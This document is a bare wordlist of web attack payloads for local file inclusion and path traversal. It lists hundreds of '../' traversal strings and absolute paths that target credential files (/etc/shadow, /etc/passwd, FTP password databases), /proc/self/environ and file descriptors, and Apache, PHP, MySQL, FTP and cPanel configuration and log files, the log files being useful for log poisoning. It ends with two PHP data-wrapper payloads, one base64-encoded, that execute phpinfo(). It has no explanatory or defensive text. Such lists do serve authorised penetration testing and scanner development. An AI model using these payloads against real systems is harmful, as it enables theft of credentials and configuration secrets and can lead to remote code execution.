../../../../../../../../etc/security/group
../../../../../../../../../../../etc/security/user
/etc/wu-ftpd/ftpusers
D:\xampp\apache\logs\error.log
../../etc/security/group
../../../../../../../../../../../../../etc/security/user
/usr/local/httpd/conf/httpd.conf
/var/log/apache2/error_log
-/etc/pure-ftpd.conf
/usr/local/cpanel/logs
../etc/shadow
../../../../../../../../../../../../proc/self/environ
C:\boot.ini
../../../../../../../../../../../../../../../../proc/self/fd/8
../../../../../../../../../../../../../../../var/log/error.log
../../../proc/self/fd/8
/proc/self/fd/33
../../../../../../../../../../../etc/group
D:/boot.ini
/etc/pure-ftpd/pure-ftpd.pdb
/proc/self/environ
/proc/self/fd/18
/proc/self/fd/22
../../../../proc/self/environ
/etc/protpd/proftpd.conf
../../../../../../../../../../proc/self/fd/8
../../../etc/security/user
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
/etc/vsftpd.conf
/etc/php/apache2/php.ini
../../../../../../../../../../../../../../../../../../proc/self/fd/8
/proc/self/status
/proc/self/fd/17
/etc/group
c:\boot.ini
/Program Files\Apache Group\Apache2\conf\httpd.conf
/proc/self/stat
../../../../../etc/security/group
../../../../../../../../../../etc/security/group
/etc/vhcs2/proftpd/proftpd.conf
C:/WAMP/logs/access.log
D:\XAMPP\logs\access.log
../../../../../../../../../proc/self/fd/8
../../../../../../../../../../../../proc/self/fd/8
../../../../../../../../../../../../../../../opt/lampp/logs/error.log
/var/log/pure-ftpd/pure-ftpd.log
/opt/xampp/logs/error.log
/etc/php4/cgi/php.ini
/proc/self/fd/19
/usr/local/apache/httpd.conf
../../../../../../../../../../etc/passwd
/usr/lib/php/php.ini
../../../../etc/group
/usr/local/pureftpd/sbin/pure-config.pl
/usr/ports/net/pure-ftpd/
/var/log/httpd/access_log
/xampp\apache\bin\php.ini
../../../../../../../../proc/self/environ
../../etc/security/passwd
../../../../../../../../etc/shadow
/etc/httpd/conf/httpd.conf
../../../../../../../../../../../../../../../opt/lampp/logs/error_log
../../../../../../../../../etc/security/passwd
d:\wamp\logs\access.log
/opt/apache2/conf/httpd.conf
../../../../../../../../../proc/self/environ
D:/xampp/logs/access.log
/usr/local/php5/httpd.conf.php
/proc/self/fd/31
/opt/xampp/logs/access_log
/proc/self/fd/35
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/group
../../../../../../../../../../../../../../../etc/httpd/logs/acces.log
/usr/apache2/conf/httpd.conf
../logs/access_log
../../../../../../../../../../../etc/security/passwd
/proc/self/fd/24
/var/www/logs/error.log
../../../../../../../../../../../../../../../var/www/logs/error.log
/opt/apache/conf/httpd.conf
../../../../../../../../../../../../../../../apache2/logs/error.log
/apache/logs/access.log
../../../../../../../../../../../../../../../var/log/apache/error.log
/var/log/error_log
/var/log/vsftpd.log
../../../../../../../../../../../../../../../usr/local/apache/logs/error.log
/Program Files\Apache Group\Apache\logs\error.log
/etc/http/conf/httpd.conf
/etc/security/environ
C:\XAMPP\logs\access.log
/proc/self/fd/21
/proc/self/fd/27
/usr/local/lib/php.ini
/var/log/proftpd
/proc/self/fd/16
c:/xampp/logs/access.log
/etc/proftp.conf
/var/log/mysqlderror.log
../../../../../../../../../../../../etc/shadow
/var/www/conf/httpd.conf
D:/XAMPP/logs/access.log
C:/wamp/logs/access.log
/proc/self/fd/34
/usr/local/Zend/etc/php.ini
/var/log/exim/mainlog
../../../../../../../../../../../../../../../usr/local/apache/logs/access.log
../var/log/httpd-access.log
../../../../../../../../../../../../../var/log/httpd-access.log
/etc/php/php4/php.ini
/php\php.ini
../../../../../../../../../etc/security/user
../../../../../../../etc/security/user
../../../../../../../../../../../../../../etc/group
../../../../../../../../../../../../../../../var/log/apache2/access.log
/etc/php4.4/fcgi/php.ini
/usr/local/php/httpd.conf.php
/var/local/www/conf/php.ini
D:\xampp\logs\access.log
/etc/vsftpd/vsftpd.conf
../../../../../../../logs/error_log
../../apache/logs/access.log
/proc/self/fd/11
/opt/xampp/logs/access.log
../../../../logs/access_log
/proc/self/fd/1
/var/log/apache/error.log
c:\XAMPP\logs\access.log
/proc/self/fd/29
../../../../../../../../../../../../../etc/passwd
/apache/logs/error.log
../../../../../proc/self/environ
../../../../../../../../../../../../../../proc/self/environ
D:\wamp\logs\access.log
d:/wamp/logs/access.log
../../../../../../../../../../../../../proc/self/fd/8
/Program Files\Apache Group\Apache\conf\httpd.conf
../../../../../../../../etc/group
/logs/error.log
../../../../../../../../../../../../../../../proc/self/environ
../../../../../../../../../../../../../../../apache/logs/error.log
/usr/local/php4/httpd.conf.php
../../../../etc/security/group
/bin/php.ini
../../../../../etc/security/user
/usr/local/apache2/httpd.conf
../../../../../../../../../../../../../../etc/security/passwd
/apache\php\php.ini
/etc/ftphosts
../../../../../../var/log/httpd-access.log
../../../../../../../../../../../../../../../var/log/httpd-access.log
/logs/access.log
/Volumes/webBackup/private/etc/httpd/httpd.conf
../../../../../../proc/self/fd/8
c:/XAMPP/logs/access.log
../../../../../../../../../../../../../../../usr/local/apache2/logs/access.log
../../etc/shadow
/Program Files\Apache Group\Apache\logs\access.log
/var/log/mysql.log
/var/log/exim/rejectlog
/etc/php5/apache2/php.ini
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
../../../../../../../../../../../../../../../var/log/apache2/access_log
../../../../../../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../../../../etc/shadow
/etc/httpd.conf
D:/WAMP/logs/access.log
/Volumes/webBackup/private/etc/httpd/httpd.conf.default
/usr/sbin/pure-config.pl
../../../../../etc/security/passwd
/usr/local/etc/php.ini
/var/log/apache2/access_log
../../../../../../../../../../../../../../../opt/lampp/logs/access_log
/etc/php5/cgi/php.ini
/etc/vsftpd.chroot_list
/usr/local/pureftpd/etc/pureftpd.pdb
../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../opt/xampp/logs/error.log
../../../../../../../../../../../../../../../opt/xampp/logs/access_log
../../../../../../../../../../../../../../../../etc/passwd
/usr/local/cpanel/logs/stats_log
../../../../../../../../../../../../../../../etc/httpd/logs/acces_log
/usr/local/apache2/conf/httpd.conf
../../../etc/security/group
../../../../../../etc/passwd
/etc/security/limits
/usr/local/cpanel/logs/login_log
/logs/error_log
/etc/pureftpd.pdb
../../../../../../../../../../../../../../../var/log/access.log
../../logs/access_log
/proc/self/fd/7
/etc/httpd/logs/acces_log
../../../../../logs/error_log
/opt/xampp/etc/php.ini
/usr/local/apache2/logs/access.log
../../../../../../../../../../../../../../../var/log/httpd/access_log
../etc/security/user
/etc/http/httpd.conf
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
../../../../../etc/shadow
../../../../../../../../../../../../../../../var/log/apache2/error.log
../../../../../../../../../../../../../../etc/shadow
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
/etc/security/passwd
/Volumes/webBackup/opt/apache2/conf/httpd.conf
/etc/logrotate.d/ftp
/logs/pure-ftpd.log
/etc/logrotate.d/proftpd
../../../logs/access_log
/etc/apache2/conf/httpd.conf
/var/mysql.log
d:/xampp/logs/access.log
../../../../../../../logs/access_log
../../../../../../../../../../../../../../../apache2/logs/access.log
/private/etc/httpd/httpd.conf
../../../../../../../../../../../../../../etc/passwd
/usr/local/apache2/logs/error.log
../../../../../../../../../../../../../../../etc/httpd/logs/error_log
/php5\php.ini
/proc/self/fd/3
/var/www/logs/access_log
/www/logs/proftpd.system.log
/usr/local/apache/logs/access_log
../../../../../../../../../../../../../../../var/www/logs/error_log
/proc/self/fd/20
/var/www/logs/access.log
/PHP\php.ini
../etc/security/group
/usr/local/php5/httpd.conf
../../../../../../../../../../../../../../proc/self/fd/8
/Program Files\xampp\apache\conf\httpd.conf
../../../../etc/security/passwd
../../../../../../../../../../../../../../../../../../proc/self/environ
C:\wamp\logs\access.log
../../../../../../../../../../../../../../../var/log/access_log
/usr/local/cpanel/logs/license_log
../../../../../../etc/security/passwd
../../../../logs/error_log
C:\xampp\logs\access.log
/var/log/exim/paniclog
../../../var/log/httpd-access.log
/usr/local/apps/apache2/conf/httpd.conf
../../../../../../../../proc/self/fd/8
../../../../../../../../../../../../../../../var/www/logs/access_log
/etc/php/php.ini
/usr/etc/pure-ftpd.conf
../../../../../../../../../../../../../../../usr/local/apache2/logs/error_log
/etc/my.cnf
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
/logs/access_log
../../../../../../../../../../../../../../../../var/log/httpd-access.log
/var/log/ftp-proxy/ftp-proxy.log
../../../etc/security/passwd
../../../../../../../etc/passwd
../../../../../../../proc/self/fd/8
../../../../../../../../../../../../../../../var/log/httpd/access.log
../../../etc/passwd
/var/log/error.log
../../../etc/shadow
../../../../../../../../../../../../../../var/log/httpd-access.log
../../../../../../../../../../../../../../../var/log/apache2/error_log
/opt/xampp/logs/error_log
/etc/php.ini
/etc/httpd/php.ini
../../../../../../proc/self/environ
/etc/httpd/logs/access_log
../../../../etc/shadow
../../../../../../../../../../../../../../../etc/httpd/logs/error.log
c:\wamp\logs\access.log
d:\XAMPP\logs\access.log
../../../../../etc/passwd
../../../../../../../../../../../../var/log/httpd-access.log
/proc/self/fd/8
/var/log/pureftpd.log
/var/log/apache2/error.log
../../var/log/httpd-access.log
/etc/apache2/httpd.conf
/proc/self/fd/23
/web/conf/php.ini
d:/boot.ini
../../etc/group
/etc/php/apache/php.ini
/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
../proc/self/fd/8
/var/log/exim_paniclog
/var/log/exim_rejectlog
/usr/ports/contrib/pure-ftpd/
/proc/self/fd/26
../etc/group
/var/log/httpd-access.log
/etc/pureftpd.passwd
../../../../../../../../../../../../../../../var/www/logs/access.log
/usr/local/apache/logs/error_log
../../../../../../../../etc/passwd
../../../../proc/self/fd/8
/usr/local/php/lib/php.ini
../etc/passwd
/home\bin\stable\apache\php.ini
proc/self/environ
/etc/php5/apache/php.ini
/proc/self/fd/15
../proc/self/environ
/usr/local/etc/apache2/conf/httpd.conf
/usr/apache/conf/httpd.conf
/usr/local/php/httpd.conf
../../../../../../../../../../../proc/self/environ
../../logs/error_log
../../../../../../../etc/security/group
/apache2/logs/error.log
../../../../../../../../../../../../../../../usr/local/apache/logs/error_log
/var/www/logs/error_log
C:/XAMPP/logs/access.log
../../../../../../../../../../../../../../../opt/xampp/logs/access.log
/proc/self/fd/2
/etc/php/cgi/php.ini
/proc/self/fd/12
/etc/httpd/httpd.conf
../../../proc/self/environ
D:\xampp\apache\logs\access.log
../../etc/security/user
../../../../../../../../../../../../../../../usr/local/apache2/logs/access_log
/var/log/xferlog
C:\WINDOWS\system32\Logfiles
../../../../../../../../../../../../../../../../../proc/self/environ
../../../../apache/logs/access.log
/usr/local/etc/apache/conf/httpd.conf
../../../../../../../../../../../../../../../usr/local/apache/logs/access_log
/etc/mysql/my.cnf
/var/log/apache2/access.log
/usr/local/apache/conf/php.ini
/var/log/httpd/error.log
../../../../../../../../../../../../../../../../proc/self/environ
/opt/lampp/logs/access.log
/usr/local/etc/apache/vhosts.conf
/usr/local/cpanel/logs/access_log
../../../../var/log/httpd-access.log
/etc/security/user
/usr/local/apache/logs/error.log
/php4\php.ini
/usr/lib/security/mkuser.default
../../../../../../../../etc/security/user
/usr/local/apache2/logs/access_log
/etc/wu-ftpd/ftphosts
/WINNT\php.ini
/var/log/ftplog
/opt/lampp/logs/error.log
/usr/local/etc/pure-ftpd.conf
../../../../../../../../../../../../../../../var/log/error_log
../../../../../../../../../etc/shadow
/opt/lampp/logs/access_log
/usr/pkgsrc/net/pureftpd/
/etc/httpd/logs/error.log
../../../../../../etc/group
../../../../../../../../../../../../etc/security/user
../../../../../../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../../../../../../var/log/apache/access_log
/proc/self/cmdline
/usr/lib/php.ini
../../../../../../../../../../../../etc/security/passwd
/var/log/access_log
/var/log/httpd/error_log
/proc/self/fd/9
/var/log/mysql/mysql-bin.log
../../../../../../../../../../../proc/self/fd/8
/proc/self/fd/5
/etc/wu-ftpd/ftpaccess
../../proc/self/fd/8
../etc/security/passwd
C:/xampp/logs/access.log
../../../../../../../../../../proc/self/environ
/etc/httpd/logs/error_log
/var/log/ftp-proxy
../../../../../../../../../../../../../../../../../var/log/httpd-access.log
/var/lib/mysql/my.cnf
../../../../../etc/group
c:/wamp/logs/access.log
/var/cpanel/cpanel.config
../../../../../../../../../../../var/log/httpd-access.log
/WINDOWS\php.ini
D:\boot.ini
../../../../../../../../../../../etc/shadow
../../etc/passwd
/proc/self/fd/14
../../../../../../../../../../../../../etc/security/passwd
/private/etc/httpd/httpd.conf.default
../../../../../../logs/error_log
../../../../../../../etc/group
../../../../../proc/self/fd/8
c:/boot.ini
/proc/self/fd/30
../../../../etc/security/user
d:\boot.ini
/usr/local/apache/logs/access.log
../../../etc/group
/etc/passwd
../../../../etc/passwd
../../../../../../../../../../../../../../../apache/logs/access.log
../../../../../../../../../etc/security/group
../../../../../../../../var/log/httpd-access.log
../../../../../../logs/access_log
/proc/self/fd/0
../../../../../../../../etc/security/passwd
../../../../../../etc/security/group
D:/wamp/logs/access.log
/opt/lampp/logs/error_log
/NetServer\bin\stable\apache\php.ini
/etc/shadow
/usr/local/php4/httpd.conf
../../../../../../../../../../var/log/httpd-access.log
/etc/pure-ftpd/pure-ftpd.conf
/var/log/maillog
../logs/error_log
../../../../../../../../../../../../../../../var/log/httpd/error_log
/etc/php4/apache2/php.ini
/etc/chrootUsers
../../../../../../../../../../../../../../../var/log/httpd/error.log
d:/XAMPP/logs/access.log
/proc/self/fd/32
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
/var/log/mysql/mysql.log
/usr/local/php4/lib/php.ini
/var/log/apache/error_log
/var/log/access.log
../../../../../var/log/httpd-access.log
../../../../../../../../../../../../../proc/self/environ
../../../apache/logs/access.log
../../../../../../../../../../etc/security/user
/usr/local/etc/httpd/conf/httpd.conf
../../../../../../../../../../../../etc/passwd
/proc/self/fd/25
/usr/local/apache/conf/httpd.conf
C:/boot.ini
/usr/local/pureftpd/etc/pure-ftpd.conf
/etc/ftpchroot
/proc/self/fd/28
../../../../../../etc/security/user
../../../../../../../../../../../../etc/group
/var/adm/log/xferlog
/etc/httpd/logs/acces.log
/proc/self/fd/4
../../../../../../../../../var/log/httpd-access.log
../../../../../../../../../../etc/group
/var/log/apache/access.log
/var/log/httpd/access.log
../../../../../../../../../../../../../../../opt/lampp/logs/access.log
../../../../../../../../../../../etc/security/group
/usr/local/etc/pureftpd.pdb
/usr/local/apache2/logs/error_log
../../../../../../../../../../../../../../../opt/xampp/logs/error_log
../../../../../../../etc/security/passwd
/proc/self/fd/13
../../../../../../../../../../../../../../../usr/lib/security/mkuser.default
/var/log/apache/access_log
/etc/security/group
/proc/self/fd/6
../../../../../logs/access_log
/var/log/exim_mainlog
/etc/php4/apache/php.ini
../../../../../../../../../etc/group
../../../../../../../proc/self/environ
../../../../../../../../../../../../../../../../../proc/self/fd/8
/proc/self/fd/10
/usr/local/cpanel/logs/error_log
../../../../../../../../../../etc/shadow
/etc/proftpd/modules.conf
/usr/local/apps/apache/conf/httpd.conf
../../../../../../etc/shadow
../../proc/self/environ
/home2\bin\stable\apache\php.ini
/etc/apache/conf/httpd.conf
/etc/logrotate.d/vsftpd.log
/var/log/mysql/mysql-slow.log
/etc/pure-ftpd/pureftpd.pdb
../../../../../../../var/log/httpd-access.log
/usr/ports/ftp/pure-ftpd/
%SystemDrive%\inetpub\logs\LogFiles
../../../../../../../../../../../../../../../usr/local/apache2/logs/error.log
/usr/local/php5/lib/php.ini
../../../../../../../etc/shadow
../../../../../../../../../../../../../../../proc/self/fd/8
/apache2/logs/access.log
../../../../../../../../../../etc/security/passwd
data:text/pain,<?php phpinfo()?>
data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=